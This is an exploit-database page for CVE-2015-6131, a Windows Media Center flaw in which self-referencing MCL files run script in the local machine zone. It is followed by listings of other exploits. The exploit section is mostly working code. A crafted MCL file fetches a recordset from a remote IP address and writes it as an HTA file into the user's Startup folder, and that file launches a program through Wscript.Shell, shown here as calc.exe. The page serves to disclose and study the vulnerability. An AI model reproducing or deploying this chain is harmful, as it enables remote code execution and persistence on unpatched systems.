Menu

Search for hundreds of thousands of exploits

"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File"

Author

Exploit author

"Eduardo Braun Prado"

Platform

Exploit platform

windows

Release date

Exploit published date

2015-12-09

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)

Software Vendor: Microsoft

Software version : MS Windows Media Center latest version on any Windows OS.

Software Vendor Homepage: http://www.microsoft.com

CVE: CVE-2015-6131

Exploit Author: Eduardo Braun Prado

Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team

date: december 8, 2015

Vulnerability description:

Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files.


exploit code below:

----------- self-exec-1.mcl ------------------------------------

<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>

------------------------------------------------------------

----------self-exec-2.mcl--------------------------------------

<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------

-----Create-recordsetfile.hta --------------

<html><body onload="aa()">

<script language="VBScript">

function aa()


defdir="."

alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". 




Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al=rs.Save(defdir & "\recordsetfile.txt")
rs.close

end function
</script></body></html>

-------------------------------------------------------------------------------


---------recordsetdata.txt------------------------------------------

<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-01-30 "Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution" local windows "Eduardo Braun Prado"
2020-01-29 "Microsoft Windows 10 - Theme API 'ThemePack' File Parsing" local windows "Eduardo Braun Prado"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-01-22 "Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution" remote windows "Eduardo Braun Prado"
2017-09-30 "Microsoft Excel - OLE Arbitrary Code Execution" dos windows "Eduardo Braun Prado"
2017-09-30 "Microsoft Word 2007 (x86) - Information Disclosure" local windows "Eduardo Braun Prado"
2017-09-28 "Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution" dos windows "Eduardo Braun Prado"
2016-05-12 "Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)" remote windows "Eduardo Braun Prado"
2015-12-09 "Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File" remote windows "Eduardo Braun Prado"
2015-07-20 "Microsoft Word - Local Machine Zone Code Execution (MS15-022)" local windows "Eduardo Braun Prado" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected